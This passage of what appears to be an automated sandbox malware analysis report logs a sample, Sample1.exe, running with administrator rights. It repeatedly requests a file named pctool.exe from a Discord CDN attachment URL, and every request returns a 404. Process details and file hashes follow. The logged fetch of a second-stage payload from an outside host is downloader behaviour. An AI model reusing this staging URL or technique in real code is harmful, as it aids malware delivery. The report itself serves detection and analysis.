                        2025-01-15 14:20:38 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.25 | 49749 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:43 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:43 UTC | 1055 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:43 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=16YvwmwPebmuJUkGnLuc2PVnou1PaOJK_iVXqkB3HIk-1736950843-1.0.1.1-bUKrTMuuO_x0aKZuyV6.qdu6DULuHnrpVV1mS3jcSkRsgisYur2Sn32QdR_nWmGF0FBaR7dSoIkrIR_QPoNbPQ; path=/; expires=Wed, 15-Jan-25 14:50:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8INunvr2tM4M6N6mHgXTMpDrT7WOBUPvINyuVE%2BHzdgrdcx%2F9kgZRUYDc8%2FXp%2FRy%2BnvJXbxNmezh99Fjr9CAEnMZ7VxsulzTNHsa5jfMsiEmb48LwiSbiwyVa5%2BzZTxqd6v%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=WuwZbGzrD1Q2d8iJcO47Hbk41QjRsEBNnae9C4cnO6c-1736950843813-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268215bbeb435d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:43 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.25 | 49750 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:49 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:49 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:49 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=AAOJlr9PoI647ppvdzzfhZwkg2xPM2nmY3gxKq9e.2g-1736950849-1.0.1.1-C6JbSl42EPVOIVijCDsndxhGJG880xMzSAkEzGndRc8kMj3jI5hCEhp.Udlquu.NnYHBptZSEtk7zx0hq8Bklg; path=/; expires=Wed, 15-Jan-25 14:50:49 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRlQkAQrPZH7FoHw1JPfIqfh5BbdpfCKPial4mjm69rzbglRXKn4%2Fnk2kL%2FGD2WNn4gjY2h5%2F%2BMXq4gLR4LazqmgpIzehxkz1gbYkeC2vJLyis%2FttSdCbHKIhoQV1vILVv5GYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=v9WvJwRlTAdzVuRJsYjILjGl2VLmZwwlI4r4jEUsFVY-1736950849426-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268238ced472a7-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:49 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.25 | 49751 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:55 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:55 UTC | 1055 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:55 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=OqRPzqswIra6hrO2UMaiauvkrdOa5mPQL77UDQFLdTg-1736950855-1.0.1.1-76A8DL_EqI39Me6hU4zgBZV5VLQg7YrL1eZ_DzwakCJNzxI9eucpbrkjPd3hcLgh0Q4ChTiMTDUVaXdE2xyo.w; path=/; expires=Wed, 15-Jan-25 14:50:55 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqIdWA1mCptmabeiTo3tSGkOF7dTUqx0YGq9Td%2FYJDm%2FJHr4LFzIeZZkPW%2BtxoYVgZafYHa9RLxFpX%2BQLJ2f8Trdi7WG%2BKmxqJxaDM5%2BTHg8rzW05C7XThe9ufT5N%2BQbIPy3rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=w7eapzP9i9t_v4lD3E.BQ4DmetI5GOQRIEohT_Fnk2E-1736950855193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026825ccfed4210-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:55 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.25 | 49755 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:00 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:00 UTC | 1041 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:00 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=EjKIvZu2Vc4zsIOBxB21KbUxoBcmYanzCAkQrjqi2nQ-1736950860-1.0.1.1-IKrPhvcr9VkiSZpVks0ijjgFopbad0QfPhgCCOiwpp0P3I.X44k_BfplrEL0fd6feu.9tewf0vIygp8bPQk3Bw; path=/; expires=Wed, 15-Jan-25 14:51:00 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXFzlh75Z6LQ73E77XDXtxFvv1deBzgKy01CL6nYETm5uG0O1tVeA00XHxdqGbxIL2tT8pSbDQQ0vw1PymOmxAFYOgzDDONjkJp4S8TPtEzCeoOSNz4eQHQ2sD3TgevBmdJhjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Jft4aplAsvvXiz.Oj6lDanZ.2MoO_.FleHx1d4SE22E-1736950860860-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682803d7e421b-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:00 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.25 | 49757 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:06 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:06 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:06 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=XI9gK2oL9f3Opz0bNjet2QRYJrDoohBIEY1iZ.4sMqA-1736950866-1.0.1.1-gm1en4m.__.4ZNGghrHlPwIXXmiKeGOkB9PvEaFaSVIWvN4hXX8SIEV_QeHGuSwEHwj5DM_n3DWxnIt04g6gMA; path=/; expires=Wed, 15-Jan-25 14:51:06 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4SIjozg82ijxSCfGJ8Q9hTuUxaosoBpt9UrG898VI7Fc24NqHHCbFnTeRCKxh67KTCY%2FVl73%2FD9anDRLCQZx4h0elAw4OY6Fr09CR%2BI03UWEtDNNttmv2QKahDPesdDIzVqRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=FBbmEqwgUfRtEFpmFDkWAve52ILyZqJZY1btgfwDmyQ-1736950866486-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682a36d6343c4-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:06 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.25 | 49760 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:12 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:12 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:12 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=17pMnJuZ.6ryANGF8z2CN1O1I9Gjw1_rLbRUFAJwWWA-1736950872-1.0.1.1-X7dJwzM9.IEixDuXu1uH_Pq_PdkAn5zQuI9ETZp.ubqsu6m.o0V1M51NdmPzokoKjC_kx1sQ8Py6lUDtLuFwsA; path=/; expires=Wed, 15-Jan-25 14:51:12 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M4XlyDN%2BI4OF6QIP3ByA7wN1MJtYq%2F3uahit77ykINdFt1as8hnN1YL9WC5fi6IgbGZYG2DgrmMRdb%2BD83I%2ByRbqNRNjV2GwE%2F9BBR0J7BZOn81LddhHXtuPadNL6JHBDevaOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=PzAvIVbuKdyGYphTd6qDkPwGW7YPf8_8ycZcqnvtv7Y-1736950872144-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682c6ba774387-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:12 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.25 | 49761 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:17 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:17 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:17 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=7itytyZjeje8HH5NJEDLC2hGsbclLJgfp1PjhnhCQF8-1736950877-1.0.1.1-jIKdIZp6erbnYvpnbUcXeAxUXA6u0Uwmi0WzuFif2LjCjknVy2ce5m5joUifmEHTumdRphUP2hmuI8VWQBA0.Q; path=/; expires=Wed, 15-Jan-25 14:51:17 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qY9N6tDOohDUYGt%2Bi%2FnRC82BYZh1nuFk4YgKvemyweVHoR7up9UT9jQqtKaq7XqG4sqrhvYLkYoHvwNSnU5GBNQuYgZL03nOehWIAzqkzz%2BNSrsidSIu6RS%2Fj%2BVfCbHNJ35XaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=njwbFFCxR0Q684HQPXN1uyB2gNhkRIqlQnkgntvTemQ-1736950877791-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902682ea1ecb7283-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:17 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.25 | 49762 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:23 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:23 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:23 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=JHazBZRvc9UqMmFCRR_tAHcuo1nVcbOsIw.hQbivLw4-1736950883-1.0.1.1-cPSkozvbvEexP1mvxROP2GicRRLZqJ9uUr.JibBxLccQvnoZLY_dKWC96GcyeIaW7a._5elMe.JuX7iGmZ1QQg; path=/; expires=Wed, 15-Jan-25 14:51:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMG0kIN61GS9QYB4B%2FPFxvNm1k14L6yuTNvy1Sd7VNBBHsDMLhk8wP56jDnFlF2FvfH22Z3g0NKxaJmel4HgY%2FqJe9vbnZmsli3yUMmxpjxjKqmu7VnjkicW0Q2Wba%2BcEsYX%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=N7C0Syy_nx2pHdZN1tf9HcDl7jxC7hQnMZY_U6EMVfA-1736950883394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026830d2c09de92-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:23 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.25 | 49765 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:28 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:29 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:29 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=grTr6ttAHBPGQ8Q2S1DHkZ2VC59011qNmpcfmQ5W1pQ-1736950889-1.0.1.1-me6Dos9HqCc_6TG43g74XBkMHuA65F9J.x2SwmzL_mLmk8t11umiFiojFwcSUpOQljZnCHOK.yszbkJ_S.MIKQ; path=/; expires=Wed, 15-Jan-25 14:51:29 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CevIaFoHDm2hv8ycdC6lfCzubEqJSooCubJU%2Be2I06vbA4EFq7WorvkL9qCvqoAGaKPeP7Z9qpQuZH%2FPI87rNewTBqPJCFHjpmf3Dq7GQjWtcR4ZdVwi2tB1XhBSADKGoH7Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=5W3Nw3iktPYLD1hnq4YUkLt_QKCzatIM.GQ66QFrdwc-1736950889040-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902683306fcb41fe-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:29 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.25 | 49766 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:34 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:34 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:34 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=jYqDV_dHoqnJASbWyURgwLPNRh4uGD33YQah.5JPZww-1736950894-1.0.1.1-3ar16d7mzQbFy6PTY9jRr9vJim1yEx_U95C4LpMIY0j4SZTjjFfScwtpJEmkzQAPLd4qWjTosugpMnP5oogMFQ; path=/; expires=Wed, 15-Jan-25 14:51:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0RTkPsyq7%2F9TzT3lcBzbzfSRvDBQrQgSnDn5xrLP55bwJjAzNEWyJgoJ6NVCm9alU359FgEUBy7o0PqpY1FlcVBeyqiYRaD3i9CnCNnTEx85k9EqlGNR3Odja85BXNZCBEjHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=GLeQt8XglSih9oznmL3CLCEqf12qzEHHApCOcawuAik-1736950894660-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026835378404309-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:34 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.2.25 | 49767 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:40 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:40 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:40 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=73UYw9EvSsc0a0M.WRnP44BmdzmqvBDTB9jERmKfMXw-1736950900-1.0.1.1-yU42jYrPUnmKi_.eIAEBxvAU1cm7InZ5Kd.jbRE0NpNZLn4gmAg5qjw7FDhe_O_p7PJA7nT..N5OWB900vzxKw; path=/; expires=Wed, 15-Jan-25 14:51:40 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kx55dVHyVHm86W48OxbSOfL2IAZ3OSNy7jAUTDek%2BSrJ4yxQTniQAOhD81EY9z6zUBEjLkU0pyC5OWm%2BHB0RaWaaunyMzmqddegCUBJd6zypxdFDfKl0n6YBi0MUKDR2uLBY8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=BulpUiyvq9AK99Qc4rJK71wKI_NoYU8EplBOFqW_dws-1736950900297-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 90268376bf624307-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:40 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.2549768162.159.134.2334438064C:\Users\user\Desktop\Sample1.exe
                        TimestampBytes transferredDirectionData
                        2025-01-15 14:21:45 UTC104OUTGET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:46 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:45 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=or_KP0offYnOYYkYmqUaug5xUScRQSaiPGZeq88BmBQ-1736950905-1.0.1.1-Cqtnmaoqjd.nmvtWa9BMgHU2vhwlWVXOjA4GsjxB9CKfCs0ELg5p9J7.S8QYYKb99oH0AsrcXccU7GxWLFsgcQ; path=/; expires=Wed, 15-Jan-25 14:51:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFTxLl0lTUFV1i6Bnh0tdynF3MhEak7RuzAY5Cb4VVnqA3V2pimOcJxfqXY2HwCWjXC3Hn3cBAC8V5BAQwLcIQ5m3WYEu9k4tnFWdgn9zHcAjJcyHkGCtQg5Siaxxb%2F7jXclnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=I3LHV65WWujpF6Ec_yl_rVGqNqq1MSpYu3XhWcRvyHY-1736950905962-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026839a1afa7c78-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:46 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        32 | 192.168.2.25 | 49773 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:21:51 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:21:51 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:21:51 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=5Xh5vgxf_PxXeis0IHG7Ur.rV_K4Bcz5HTXLcXbskqA-1736950911-1.0.1.1-oylfIZKfgoAPvZeQ6iBkwy8b_jcEP8WwTCYiH7TaWVC5ba2lfBgR.AEOfjnzsY5dVOtbXmMiyGRo3DXpOz6fQA; path=/; expires=Wed, 15-Jan-25 14:51:51 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StAGdgw89weyV1wmXhoWJcsidLqZrPf%2FKqao8kFAkiu9MdLKIGdG817SM0DKCCZUMn9op58htEidnTcQFEXorDj1eX%2BURxsg2BM04PuyJLEq9x9M5tYYGbjnvcSoJKeo4GgXfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=p0uvFfcKNyiNygzwFm1C9WSg2KTIV7YLEgd0tZ.mYsk-1736950911587-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902683bd5831c35d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:21:51 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Target ID: 0
                        Start time: 09:18:46
                        Start date: 15/01/2025
                        Path: C:\Users\user\Desktop\Sample1.exe
                        Wow64 process (32bit): false
                        Commandline: "C:\Users\user\Desktop\Sample1.exe"
                        Imagebase: 0x750000
                        File size: 8'192 bytes
                        MD5 hash: 45A47D815F2291BC7FC0112D36AAAD83
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: low
                        Has exited: false

                        Target ID: 39
                        Start time: 09:21:44
                        Start date: 15/01/2025
                        Path: C:\Windows\System32\SystemSettingsBroker.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding
                        Imagebase: 0x7ff70cfb0000
                        File size: 220'536 bytes
                        MD5 hash: 899E65893CDEE7F9022DC9B583F94F0F
                        Has elevated privileges: false
                        Has administrator privileges: false
                        Programmed in: C, C++ or other language
                        Reputation: low
                        Has exited: false

                        No disassembly